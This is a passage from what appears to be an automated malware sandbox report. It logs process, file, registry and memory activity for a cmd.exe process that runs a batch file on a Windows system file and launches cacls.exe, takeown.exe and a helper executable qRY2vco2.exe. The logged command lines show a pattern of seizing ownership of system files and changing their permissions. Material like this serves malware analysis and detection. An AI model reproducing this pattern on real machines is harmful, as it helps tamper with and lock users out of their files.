| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xedc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xda4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x6b8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "To_Do_List.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "To_Do_List.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #141: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #141 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:03:55, Reason: Self Terminated |
| Monitor Duration | 00:01:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4e8 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B24
0x
D9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x04feffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ff0000 | 0x04ff0000 | 0x04ffffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x05003fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x05011fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x05013fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005020000 | 0x05020000 | 0x05033fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0517ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005180000 | 0x05180000 | 0x05183fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005190000 | 0x05190000 | 0x05190fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000051a0000 | 0x051a0000 | 0x051a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051b0000 | 0x051b0000 | 0x051bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051e0000 | 0x051e0000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051f0000 | 0x051f0000 | 0x0535ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051f0000 | 0x051f0000 | 0x0522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005260000 | 0x05260000 | 0x0535ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05360000 | 0x0541dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x0551ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005520000 | 0x05520000 | 0x0565ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05660000 | 0x05996fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f8f0000 | 0x7f8f0000 | 0x7f9effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f9f0000 | 0x7f9f0000 | 0x7fa12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fa17000 | 0x7fa17000 | 0x7fa17fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa18000 | 0x7fa18000 | 0x7fa1afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa1b000 | 0x7fa1b000 | 0x7fa1bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa1d000 | 0x7fa1d000 | 0x7fa1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 94 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 42, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xf70, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x8b0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xc40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "ImagingDevices.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "ImagingDevices.exe.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #142: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #142 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Journal.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:51, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe8c |
| Parent PID | 0xc40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A14
0x
DB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x001d0000 | 0x001f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00210000 | 0x002cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a07fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x01f9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
